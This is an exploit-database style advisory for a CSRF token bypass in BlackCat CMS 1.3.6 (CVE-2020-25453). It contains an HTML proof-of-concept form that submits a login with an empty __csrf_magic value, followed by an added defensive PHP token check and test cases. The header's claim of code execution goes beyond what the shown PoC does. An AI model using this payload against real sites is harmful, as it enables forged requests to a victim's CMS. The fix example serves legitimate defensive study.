# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453

BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that allows remote arbitrary code execution.

PoC (Remove the csrf_token value) :

<input type="hidden" name="__csrf_magic" value=""/>

-------------------------------------------------------------------------------

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php" method="POST">
      <input type="hidden" name="__csrf_magic" value=""/>
      <input type="hidden" name="username_fieldname" value="username_274807982ed4"/>
      <input type="hidden" name="password_fieldname" value="password_75868428f837"/>
      <input type="hidden" name="_cat_ajax" value="1"/>
      <input type="hidden" name="username_274807982ed4" value="accountname"/>
      <input type="hidden" name="password_75868428f837" value="yourpassword"/>
      <input type="submit" value="Submit request"/>
    </form>
  </body>
</html>
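
The PoC relies on a request with an empty __csrf_magic value being accepted. The following PHP is an added example of a token check that fails closed on that input; it is not code from BlackCat CMS, csrf-magic or the exploit author, and the function names csrf_issue and csrf_check, the session key csrf_token and the sample requests are hypothetical.

```php
<?php
// Added example, not BlackCat CMS code. Names and sample data are constructed.

// Issue one random token per session; call this when rendering the form.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Fail closed: a missing, empty or non-string value is a failed check,
// never a reason to skip the check.
function csrf_check(array $session, array $post, string $field = '__csrf_magic'): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post[$field] ?? '';
    // hash_equals('', '') is true, so a session with no issued token plus an
    // empty field would pass a bare comparison. Reject both cases explicitly.
    if (!is_string($expected) || $expected === '') {
        return false;
    }
    if (!is_string($supplied) || $supplied === '') {
        return false; // the PoC's value="" ends here
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed requests, run from the CLI: php csrf_check_demo.php
$session = [];
$token   = csrf_issue($session);
$cases = [
    'valid token'         => [$session, ['__csrf_magic' => $token]],
    'empty token (PoC)'   => [$session, ['__csrf_magic' => '']],
    'field removed'       => [$session, []],
    'array, not a string' => [$session, ['__csrf_magic' => ['x']]],
    'wrong token'         => [$session, ['__csrf_magic' => str_repeat('0', 64)]],
    'no session token'    => [[], ['__csrf_magic' => '']],
];
foreach ($cases as $name => [$sess, $post]) {
    printf("%-22s %s\n", $name, csrf_check($sess, $post) ? 'accept' : 'reject');
}
```

Only the first case is accepted; every other request, including the empty-token form from the PoC, is rejected before any login handling would run.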